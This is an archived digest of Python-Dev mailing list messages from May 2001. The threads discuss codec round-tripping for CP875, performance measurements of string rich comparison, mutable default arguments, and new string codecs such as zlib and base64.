Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3B00E98E.1C44FF5@lemburg.com> Message-ID: [MAL] > Round-tripping is obviously very important if you use Unicode > as basis for working on text. Since I use 7-bit ASCII exclusively, I've been using encode = decode = lambda x: x I haven't proved that's round-trippable, but haven't bumped into an exception yet. > I don't know about the reasoning behind making cp875 fail the > round-trip -- Unicode certainly provides means to make mappings > round-trip safe (e.g. by reverting to the private Unicode > char. point areas). Then I ignorantly but confidently (indeed, with the cheery confidence only the truly ignorant can truly enjoy!) vote for your approach that maps the non-round-trippable cp875 code points to None. Better safe than sorry, by default. Else 6 of the 7 ambiguous chars will be silent surprises by default. From tim.one at home.com Wed May 16 09:25:28 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 03:25:28 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105151527.KAA28734@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > PEP 207 is quite explicit that == and != are not to be assumed each > other's complement. It is silent on the x==x issue but the PEP > mentions IEEE 754 so I agree that this also shouldn't be cut short. It's explicit about x==x too: (Note: Python currently assumes that x==x is always true and x!=x is never true; this should not be assumed.) That's from the end of point #4, under "Proposed Resolutions". I agreed then, and still do . From martin at loewis.home.cs.tu-berlin.de Wed May 16 09:28:45 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 09:28:45 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.26334.610144.846269@slothrop.digicool.com> (message from Jeremy Hylton on Tue, 15 May 2001 13:26:54 -0400 (EDT)) References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> Message-ID: <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> > Sounds like we ought to do a search-and-destroy on type comparisons, > replacing with isinstance() where possible. At least in my applications, this is unfortunately not possible: I want a test for byte-string-or-unicode-string. This could be done with two isinstance calls, but that is certainly less efficient. Marc-Andre once proposed a type representing the immediate supertype of both byte strings and unicode strings; let's call it abstract string. Then I could write isinstance(e, types.AbstractString). Regards, Martin From martin at loewis.home.cs.tu-berlin.de Wed May 16 09:24:56 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 09:24:56 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.42180.401918.223487@anthem.wooz.org> (barry@digicool.com) References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.42180.401918.223487@anthem.wooz.org> Message-ID: <200105160724.f4G7OuF01764@mira.informatik.hu-berlin.de> > GvR> I'm curious where the frequent comparisons of types come > GvR> from. > > Not to mention the several hundred comparisons to None. This is harder to analyse; I set a gdb breakpoint on the place where RichCompare gets PyType_Type, then tried to see what it does, then ignoring the breakpoint a few times. This is what I've found; I may miss important cases. In PyXML, the expression type(e) in [types.StringType, types.UnicodeType] is frequently computed. This is a sequence_contains, which in turn does two Py_EQ tests. In addition, compile.c:com_add has t = Py_BuildValue("(OO)", v, v->ob_type) PyDict_GetItem(dict, t) Again, the dictionary lookup performs Py_EQ on the tuples, which does Py_EQ on the elements. This also accounts for the RichCompare calls which receive None: v may be None, here, so t is (None, type(None)). In IDLE, the situation is similar. com_add produces many compares with types. In addition, sre.compile has type(s) in sre_compile.STRING_TYPES which is the same test as the PyXML one. Finally, there is a type-in-typetuple test inside Tkinter._cnfmerge. Regards, Martin From i_sofer at yahoo.com Wed May 16 09:53:25 2001 From: i_sofer at yahoo.com (Idan Sofer) Date: 16 May 2001 10:53:25 +0300 Subject: [Python-Dev] Bug report: empty dictionary as default class argument Message-ID: <200105160756.KAA29616@alpha.netvision.net.il> Hello. I have found a rather annoying bug in Python, present in both Python 1.5 and Python 2.0. If a class has an argument with a default of an empty dictionary, then all instances of the same class will point to the same dictionary, unless the dictionary is explictly defined by the constructor. I attach a piece of code that demostrates the problem -------------- next part -------------- A non-text attachment was scrubbed... Name: test.py Type: text/x-python Size: 1197 bytes Desc: not available URL: From martin at loewis.home.cs.tu-berlin.de Wed May 16 10:02:01 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Wed, 16 May 2001 10:02:01 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de> > Since that's the exact opposite of what I want to do, it's at least > interesting . I'll put a patch on SF soon which does what you want to do, i.e. tries tp_compare as the first thing if tp_richcompare is not there. Even with this patch, your code is faster if strings have a richcompare. Without richcompare, I get 0.720 0.720 0.720 0.730 0.720 0.720 0.730 0.720 0.720 0.730 With it, I get 0.710 0.720 0.720 0.710 0.710 0.720 0.710 0.710 0.710 0.720 Given that stock CVS python is in the 0.78 range, the different is neglectable, though. Regards, Martin From larsga at garshol.priv.no Wed May 16 10:19:10 2001 From: larsga at garshol.priv.no (Lars Marius Garshol) Date: 16 May 2001 10:19:10 +0200 Subject: [Python-Dev] Bug report: empty dictionary as default class argument In-Reply-To: <200105160756.KAA29616@alpha.netvision.net.il> References: <200105160756.KAA29616@alpha.netvision.net.il> Message-ID: * Idan Sofer | | If a class has an argument with a default of an empty dictionary, | then all instances of the same class will point to the same | dictionary, unless the dictionary is explictly defined by the | constructor. This is part of the language semantics, and so not a bug. The default values of optional arguments are evaluated when the function/method is compiled. You may consider the semantics ill-advised, but it is intentional. | class foo: | | def __init__(self,attribs={}): | self.attribs=attribs; | return None; I usually write this as: class Foo: def __init__(self, attribs = None): self.attribs = attribs or {} --Lars M. From fredrik at pythonware.com Wed May 16 10:18:44 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Wed, 16 May 2001 10:18:44 +0200 Subject: [Python-Dev] Bug report: empty dictionary as default class argument References: <200105160756.KAA29616@alpha.netvision.net.il> Message-ID: <011401c0dde0$d4adb2e0$0900a8c0@spiff> Idan Sofer wrote: > > I have found a rather annoying bug in Python, present in both Python 1.5 > and Python 2.0. > > If a class has an argument with a default of an empty dictionary, then > all instances of the same class will point to the same dictionary, > unless the dictionary is explictly defined by the constructor. maybe you should check the documentation (or the FAQ) before submitting bugs? http://www.python.org/doc/current/ref/function.html Default parameter values are evaluated when the function definition is executed. This means that the expression is evaluated once, when the function is defined, and that that same ``pre- computed'' value is used for each call. This is especially important to understand when a default parameter is a mutable object, such as a list or a dictionary: if the function modifies the object (e.g. by appending an item to a list), the default value is in effect modified. Cheers /F PS. when you do report real bugs, please use the bug tracker: http://sourceforge.net/tracker/?group_id=5470&atid=105470 "is this a bug" questions should be sent to comp.lang.python From tim.one at home.com Wed May 16 10:41:47 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 04:41:47 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> Message-ID: [Martin] > Producing numbers is easy :-) If only making sense of them were too <0.6 wink>. > I've instrumented my version where string implements richcmp, and > special-cases everything I can think of. 1. String objects are also equal despite being different objects, if their ob_sinterned pointers are equal and non-NULL. So if you're looking for every trick in & out of the book, that's another one. 2. But the real goal is to add only those special cases that in combination yield the largest net win, and that's much harder to determine (since there are no typical apps, and it's very hard to quantify the tradeoffs here in a credible x-platform x-app way). > Counting is done for running the test suite. With this, I get > > Calls to string_richcompare: 2378660 > Calls with different types: 33992 (ie. one is not a string) > Calls with identical strings: 120517 > Calls where lens decide !EQ: 1775716 > ---------------------------- > Calls richcmp -> oldcomp: 448435 > Total calls to oldcomp: 1225643 > Calls oldcomp -> memcmp: 860174 > > So 5% of the calls are with identical strings, for which I can > immediately decide the outcome. But also at the cost of doing a fruitless compare and branch in 95% of calls. There isn't enough data to guess whether this is a net win or a net loss (compared to leaving this special case out). Note that if the "identical string pointers" special case is a net win, it would be effective inside oldcomp instead (i.e., you don't need a richcompare slot to exploit it); indeed, it may be more effective there, since there are some 800,000 calls to oldcmp that *didn't* come from richcmp, and oldcmp doesn't check for pointer equality now (but PyObject_Compare does, so there didn't *used* to be any point to it in oldcmp). Any idea where those 800,000 virgin calls to oldcomp are coming from? That's a lot. > 75% can be decided in terms of the string lengths, which leaves ca. 19% > for cases where lexicographical comparison is needed. So about 1 in 5 times there's also the additional (wrt just calling oldcmp all the time) overhead of a second function call (i.e., the call to oldcmp made by richcmp). > In those cases, the first byte decides in 30%. If I remove the test > for "len decides !EQ", I get > > #riches: 2358322 > #riches_ni: 34108 > #idents_decide: 102050 > #lens_decide: 0 > -------------------------------------- > rest(computed): 2222164 > #comps: 2949421 > #memcmps: 917776 > > So still, ca. 30% can be decided by first byte. Sorry, I couldn't follow this part, except noting that 917776 is about 30% of 2949421, in which case I would have expected you to say that 70% can be decided by first byte. > It still appears that the total number of calls to memcmp is higher > when the length is not taken into consideration. Since 917776 is larger than the earlier 860174, isn't that plain? BTW, some compilers inline memcmp, so assuming it's "a call" is a x-platform trap; of course assuming it *isn't* is also a x-platform trap. > To verify this claim, I've counted the cases where the length > decides the outcome, but looking at the first byte also had: > > lens_decide: 1784897 > lens_decide_firstbyte_wouldhave:1671148 > > So in 6% of the cases, checking the length alone gives a decision > which looking at the first byte doesn't; plus it saves a function > call. OTOH, 19% of all richcmp calls ended up calling oldcmp too, so the *net* effect is muddy at best. > To support the thesis that Py_EQ is the common case for strings, I > counted the various operations: > > pyEQ:2271593 > pyLE:9234 > pyGE:0 > pyNE:20470 > pyLT:22765 > pyGT:578 This clearly wasn't doing much sorting of strings (or of tuples containing strings, etc) -- .sort() never uses pyEQ (it only uses pyLT). > Now, that might be flawed since comparing strings for equal is > extremely frequent in the testsuite. To give more credibility to the > data, I also ran setup.py with my instrumented ./python: In the absence of non-trivial use of sorting or the bisect module or one of the search tree modules out there, it's easy to buy that PyEQ is most common for strings. What's not clear is that adding a rich comparison slot actually helps overall (as compared to continuing to let string_compare() handle it, and if the pointer equality test actually saves more than it costs, adding it there instead). It's clearer that this is going to hurt sorting (& bisect etc), by adding yet another layer of function call to get Py_LT resolved (as for dict compares too, the string richcmp can't do anything to speed up Py_LT that string oldcmp can't do just as efficiently -- indeed, that's the great advantage oldcmp's "compare first character" test had: that *can* decide Py_LT in one byte much of the time (but length comparison cannot)). Note too earlier mail about how adding a richcmp slot to strings will suddenly slow cmp(string1, string2) (which is the usual way to program a search tree, because cmp() *used* to call a string comparison routine only once; but after adding a richcmp slot, each cmp(string1, string2) will call the richcmp slot from 1 thru 3 times (data-dependent)). > ... > That shows that optimizing for Py_NE is not worth it. With these data, > I'll upload a patch to SF. Which is here: http://sourceforge.net/tracker/index.php?func=detail&aid=424335& group_id=5470&atid=305470 Heh: let's grab all the ugly URLs off of SourceForge, stick them in a giant list, and sort them. Can't think of a more typical app than that . Thanks for the work, Martin! From tim.one at home.com Wed May 16 10:51:17 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 04:51:17 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.46090.203278.397835@anthem.wooz.org> Message-ID: [Barry A. Warsaw] > ... > from types import StringType > import time > r = range(1000000) > > def one(r=r): > x = 'hello' > t0 = time.time() > for i in r: Random clue: when you're too lazy to try to subtact out loop overhead (not a knock, I am too), you may have better luck with r = [1] * 1000000 than r = range(1000000) The reason is that the former way gets to keep incref'ing and decref'ing a single object (as it's repeatedly bound to "i" across iterations), instead of slobbering all over memory inc'ing and dec'ing a million distinct objects. there's-as-an-art-to-doing-nothing-quickly-ly y'rs - tim From tim.one at home.com Wed May 16 10:56:56 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 04:56:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <20010515222738.A9996@thyrsus.com> Message-ID: [poor Tim] > In Python terms, those are Pythong lon (unbounded) ints today ^^^^^^^ [Greg Ewing] > What Pythonistas wear on their feet? [Eric S. Raymond] > No, man. It's what sexy lady Pythonistas wear on the beach in Rio. Eric wins! That's indeed what I was thinking of. I'm surprised nobody asked what a lon was. But not as surprised that I didn't try to blame this on a Outlook 2000 bug. > (Yes, I know some sexy lady Pythonistas. No, you can't have their > phone numbers. Pthfthfthpht...) Too much work anyway. They can have mine: 703 758 8258. but-they-better-*really*-love-python-cuz-i-give-quizzes-ly y'rs - tim From esr at thyrsus.com Wed May 16 11:17:09 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 16 May 2001 05:17:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: ; from tim.one@home.com on Wed, May 16, 2001 at 04:56:56AM -0400 References: <20010515222738.A9996@thyrsus.com> Message-ID: <20010516051709.C11602@thyrsus.com> Tim Peters : > [poor Tim] > > In Python terms, those are Pythong lon (unbounded) ints today > ^^^^^^^ > [Greg Ewing] > > What Pythonistas wear on their feet? > > [Eric S. Raymond] > > No, man. It's what sexy lady Pythonistas wear on the beach in Rio. > > Eric wins! That's indeed what I was thinking of. I'm surprised nobody asked > what a lon was. But not as surprised that I didn't try to blame this on a > Outlook 2000 bug. > > > (Yes, I know some sexy lady Pythonistas. No, you can't have their > > phone numbers. Pthfthfthpht...) > > Too much work anyway. They can have mine: 703 758 8258. Hmmm...now, which one of them should I try to talk into a snakeskin bikini? Duh. Answer obvious: the one I can talk *out* of a snakeskin bikini most rapidly afterwards. Then I'll give her your number -- that is, if I don't get too, er, distracted. seeming-like-a-good-time-to-practice-my-Timlike-wink'ly yours, -- Eric S. Raymond Every Communist must grasp the truth, 'Political power grows out of the barrel of a gun.' -- Mao Tse-tung, 1938, inadvertently endorsing the Second Amendment. From mal at lemburg.com Wed May 16 11:29:49 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 11:29:49 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3B02488D.415BA95F@lemburg.com> Tim Peters wrote: > > [MAL] > > Round-tripping is obviously very important if you use Unicode > > as basis for working on text. > > Since I use 7-bit ASCII exclusively, I've been using > > encode = decode = lambda x: x > > I haven't proved that's round-trippable, but haven't bumped into an exception > yet. For character map codecs the complete range(256) of possible input characters should pass the round-trip test, that is encoded text -> Unicode -> encoded text should result in the identiy mapping for all c in map(chr,range(256)). > > I don't know about the reasoning behind making cp875 fail the > > round-trip -- Unicode certainly provides means to make mappings > > round-trip safe (e.g. by reverting to the private Unicode > > char. point areas). > > Then I ignorantly but confidently (indeed, with the cheery confidence only > the truly ignorant can truly enjoy!) vote for your approach that maps the > non-round-trippable cp875 code points to None. Better safe than sorry, by > default. Else 6 of the 7 ambiguous chars will be silent surprises by > default. I will check in a patch which moves the building logic for encoding maps to codecs.py. This will simplify the task of choosing the "right" solution. Currently I'm in favour of: def make_encoding_map(decoding_map): """ Creates an encoding map from a decoding map. If a target mapping in the decoding map occurrs multiple times, then that target is mapped to None (undefined mapping), causing an exception when encountered by the charmap codec during translation. One example where this happens is cp875.py which decodes multiple character to \u001a. """ m = {} for k,v in decoding_map.items(): if not m.has_key(v): m[v] = k else: m[v] = None return m Perhaps we should also have a codecs.finalize_decoding_map() API in codecs.py which checks the decoding map and postprocesses it in case it finds a problem ?! -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Wed May 16 11:32:36 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 11:32:36 +0200 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> Message-ID: <3B024934.58232325@lemburg.com> "Martin v. Loewis" wrote: > > > Sounds like we ought to do a search-and-destroy on type comparisons, > > replacing with isinstance() where possible. > > At least in my applications, this is unfortunately not possible: I > want a test for byte-string-or-unicode-string. This could be done with > two isinstance calls, but that is certainly less efficient. > > Marc-Andre once proposed a type representing the immediate supertype > of both byte strings and unicode strings; let's call it abstract string. > Then I could write isinstance(e, types.AbstractString). I'm still holding on to that idea... hopefully, Guido's type checkins will make this possible in 2.2 or 2.3. The same should then be done for numbers, sequences and mappings (all abstract "types" defined in abstract.c). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Wed May 16 11:34:40 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 11:34:40 +0200 Subject: [Python-Dev] Comparison speed References: Message-ID: <3B0249B0.5DD10A4C@lemburg.com> Tim Peters wrote: > > [Martin] > > Producing numbers is easy :-) > > If only making sense of them were too <0.6 wink>. FYI, I've added a few compare tests to pybench which now is available as version 0.9. You can download it from my Python page. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh at python.net Wed May 16 12:53:16 2001 From: mwh at python.net (Michael Hudson) Date: 16 May 2001 11:53:16 +0100 Subject: [Python-Dev] Easy codec access In-Reply-To: Guido van Rossum's message of "Tue, 15 May 2001 11:35:09 -0500" References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> Message-ID: Guido van Rossum writes: > > I've just checked in a set of patches which implement the new > > .decode() method along with a couple of useful codecs. > > Cool! Indeed. Good idea, Marc! This is a bit unfriendly though: >>> "bobbins".encode("gzip") Traceback (most recent call last): File "", line 1, in ? File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function raise SystemError,\ SystemError: module "encodings.gzip" failed to register I thought SystemErrors shouldn't ever happen (isn't it what gets raised for an illegal opcode, for example?). > > To see just how easy it is to write codecs, please have > > a look at the string codecs I added in this patch (e.g. > > zlib_codec.py or hex_codec.py). I am pretty sure that there > > are a lot more useful things in the standard lib which could > > benefit from these easy-to-use interfaces. > > As an excercise, I added a quoted-printable codec. It was easy > indeed! urlencode would be nice. Maybe re.escape, too. html entities? That's probably a bigger can of worms, but print "

%s

"%text.encode("html") seems delightfully simpleminded. Cheers, M. -- GAG: I think this is perfectly normal behaviour for a Vogon. ... VOGON: That is exactly what you always say. GAG: Well, I think that is probably perfectly normal behaviour for a psychiatrist. -- The Hitch-Hikers Guide to the Galaxy, Episode 9 From mal at lemburg.com Wed May 16 13:06:14 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 13:06:14 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> Message-ID: <3B025F26.A625DE02@lemburg.com> Michael Hudson wrote: > > Guido van Rossum writes: > > > > I've just checked in a set of patches which implement the new > > > .decode() method along with a couple of useful codecs. > > > > Cool! > > Indeed. Good idea, Marc! Thanks :-) > This is a bit unfriendly though: > > >>> "bobbins".encode("gzip") > Traceback (most recent call last): > File "", line 1, in ? > File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function > raise SystemError,\ > SystemError: module "encodings.gzip" failed to register > > I thought SystemErrors shouldn't ever happen (isn't it what gets > raised for an illegal opcode, for example?). This is due to the zlib module not being installed. The reason for the search function in encodings/__init__.py raising a SystemError is that it did find a module named gzip, but this module does not export the needed registration API getregentry(). Perhaps it should just raise a LookupError instead, though... > > > To see just how easy it is to write codecs, please have > > > a look at the string codecs I added in this patch (e.g. > > > zlib_codec.py or hex_codec.py). I am pretty sure that there > > > are a lot more useful things in the standard lib which could > > > benefit from these easy-to-use interfaces. > > > > As an excercise, I added a quoted-printable codec. It was easy > > indeed! > > urlencode would be nice. Maybe re.escape, too. html entities? > That's probably a bigger can of worms, but > > print "

%s

"%text.encode("html") > > seems delightfully simpleminded. Right. That's the idea... volunteers are welcome :-) There are lots of those little "escape this, encode that" tasks which could benefit from the codec machinery. The ones you mention would certainly be good candidates. pickle and marshal would also be a good to have wrapped as codecs. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh at python.net Wed May 16 13:19:15 2001 From: mwh at python.net (Michael Hudson) Date: 16 May 2001 12:19:15 +0100 Subject: [Python-Dev] Easy codec access In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 16 May 2001 13:06:14 +0200" References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > > This is a bit unfriendly though: > > > > >>> "bobbins".encode("gzip") > > Traceback (most recent call last): > > File "", line 1, in ? > > File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function > > raise SystemError,\ > > SystemError: module "encodings.gzip" failed to register > > > > I thought SystemErrors shouldn't ever happen (isn't it what gets > > raised for an illegal opcode, for example?). > > This is due to the zlib module not being installed. No it's not, actually. I *thought* I was getting the error message because the zlib encoding doesn't alias itself to gzip (whether it should or not is another question). But in fact if you specify a bogus encoding you get a nice error message: >>> "bobbins".encode("nonesuch") Traceback (most recent call last): File "", line 1, in ? LookupError: unknown encoding but: >>> "bobbins".encode("sys") Traceback (most recent call last): File "", line 1, in ? File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function raise SystemError,\ SystemError: module "encodings.sys" failed to register I have to admit I don't really know what's going on here, but the error is just confusing. > The reason for the search function in encodings/__init__.py raising > a SystemError is that it did find a module named gzip, but this > module does not export the needed registration API getregentry(). Yep. > Perhaps it should just raise a LookupError instead, though... Might be easiest. > > urlencode would be nice. Maybe re.escape, too. html entities? > > That's probably a bigger can of worms, but > > > > print "

%s

"%text.encode("html") > > > > seems delightfully simpleminded. > > Right. That's the idea... volunteers are welcome :-) Maybe this evening. > There are lots of those little "escape this, encode that" tasks > which could benefit from the codec machinery. The ones you > mention would certainly be good candidates. pickle and marshal > would also be a good to have wrapped as codecs. Ooh yes, hadn't thought of them. 'YW5vdGhlci1mdW4tdG95\n'.decode("base64")-ly y'rs M. -- There's an aura of unholy black magic about CLISP. It works, but I have no idea how it does it. I suspect there's a goat involved somewhere. -- Johann Hibschman, comp.lang.scheme From aahz at rahul.net Wed May 16 15:16:18 2001 From: aahz at rahul.net (Aahz Maruch) Date: Wed, 16 May 2001 06:16:18 -0700 (PDT) Subject: [Python-Dev] Comparison speed In-Reply-To: <20010515222738.A9996@thyrsus.com> from "Eric S. Raymond" at May 15, 2001 10:27:38 PM Message-ID: <20010516131618.C40CC99C91@waltz.rahul.net> Eric S. Raymond wrote: > > (Yes, I know some sexy lady Pythonistas. No, you can't have their > phone numbers. Pthfthfthpht...) That's okay, I have their e-mail addresses. Wanna bet on which of us gets a response first? -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From barry at digicool.com Wed May 16 15:42:15 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 16 May 2001 09:42:15 -0400 Subject: [Python-Dev] Comparison speed References: <15105.46090.203278.397835@anthem.wooz.org> Message-ID: <15106.33719.14403.13051@anthem.wooz.org> >>>>> "TP" == Tim Peters writes: TP> Random clue: when you're too lazy to try to subtact out loop TP> overhead (not a knock, I am too), you may have better luck TP> with TP> r = [1] * 1000000 TP> than TP> r = range(1000000) Ah, good point! From guido at digicool.com Wed May 16 17:01:40 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 16 May 2001 10:01:40 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Wed, 16 May 2001 09:28:45 +0200." <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> Message-ID: <200105161501.KAA02226@cj20424-a.reston1.va.home.com> > Marc-Andre once proposed a type representing the immediate supertype > of both byte strings and unicode strings; let's call it abstract string. > Then I could write isinstance(e, types.AbstractString). This will probably be doable in 2.2. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 16 17:24:55 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 16 May 2001 10:24:55 -0500 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: Your message of "Tue, 15 May 2001 20:01:05 -0400." References: Message-ID: <200105161524.KAA02518@cj20424-a.reston1.va.home.com> > The question remaining is how much of this list/tuple richcmp behavior is > guaranteed by the language and how much is just implementation-dependent > fuzz. Unclear what you're asking. The language doesn't require any particular semantics for sequence comparisons, but the language of course includes the tuple and list squence types, and it describes (albeing lacking some rigorous detail) what comparisons for those do. If there are specific lacks of detail, it probably helps to think about filling those in. > For a more vanilla example, I removed the EQ/NE "lengths differ?" > tuple richcmp early-exit test because I never found code that made > it trigger. (but tons of code that gets there without triggering). > But this has semantic implications too: an implementation without > the early exit may call user-defined comparison routines that raise > exceptions when comparing tuples of different lengths now. Do you > care? (I don't.) I don't care about exceptions either in this case; the shortcut seems fair game. --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Wed May 16 16:28:04 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 16 May 2001 09:28:04 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: <3B025F26.A625DE02@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> Message-ID: <15106.36468.62292.611515@beluga.mojam.com> mal> pickle and marshal would also be a good to have wrapped as codecs. Why? They operate on much more than strings. -- Skip Montanaro (skip at pobox.com) (847)971-7098 From fredrik at effbot.org Wed May 16 17:07:18 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 16 May 2001 17:07:18 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> Message-ID: <002101c0de19$e7875a90$e46940d5@hagrid> skip wrote: > mal> pickle and marshal would also be a good to have wrapped as codecs. > > Why? They operate on much more than strings. hypergeneralization, of course. more candidates: "10".decode("int") "10.0".decode("float") "[1, 2, 3]".decode("list") "readme.txt".decode("file") "SyntaxError".decode("raise") (etc) Cheers /F From nas at python.ca Wed May 16 18:19:42 2001 From: nas at python.ca (Neil Schemenauer) Date: Wed, 16 May 2001 09:19:42 -0700 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 14, 2001 at 09:40:21PM +0200 References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> Message-ID: <20010516091942.A16455@glacier.fnational.com> Martin v. Loewis wrote: > In any case, I think you need to analyse this in a debugger. #7 0x080bc17e in tupletraverse (o=0x8154914, visit=0x807d640 , arg=0x0) at ../Objects/tupleobject.c:366 366 err = visit(x, arg); (gdb) p *o $11 = {ob_refcnt = 1, ob_type = 0x80eb5a0, ob_size = 1, ob_item = {0x402c5180}} (gdb) p *o->ob_item[0] $12 = {ob_refcnt = 2, ob_type = 0x0} In other words the GC is finding a tuple object that contains an element with a funny looking address (data segment?) and an op_type of NULL. The collector has started running from here: #10 0x0807debc in collect_generations () at ../Modules/gcmodule.c:467 #11 0x0807dfc4 in _PyGC_Insert (op=0x819f57c) at ../Modules/gcmodule.c:507 #12 0x080af56a in PyDict_New () at ../Objects/dictobject.c:149 #13 0x0808d8b8 in getBaseDictionary (type=0x402bcc40) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1249 #14 0x0808eb45 in initializeBaseExtensionClass (self=0x402bcc40) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1495 #15 0x08095fb1 in export_subclassed_type (dict=0x81851fc, name=0x402a9388 "GdkDragContext", typ=0x402bcc40, bases=0x816fc34) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:3451 #16 0x400194ac in pygobject_register_class (dict=0x81851fc, class_name=0x402a9388 "GdkDragContext", get_type=0x404d5c50 , ec=0x402bcc40, bases=0x816fc34) at gobjectmodule.c:202 #17 0x402a55fd in pygtk_register_classes (d=0x81851fc) at gtk.c:31844 #18 0x40257004 in init_gtk () at gtkmodule.c:98 I don't have time to dig deeper into this right now but perhaps this will help someone. Neil From mal at lemburg.com Wed May 16 18:24:57 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 18:24:57 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid> Message-ID: <3B02A9D9.113836D6@lemburg.com> Fredrik Lundh wrote: > > skip wrote: > > > mal> pickle and marshal would also be a good to have wrapped as codecs. > > > > Why? They operate on much more than strings. Of course. Still their basic task is to take an object and encode in some way for dumps() and do the reverse for loads(). That's pretty much what codecs normally 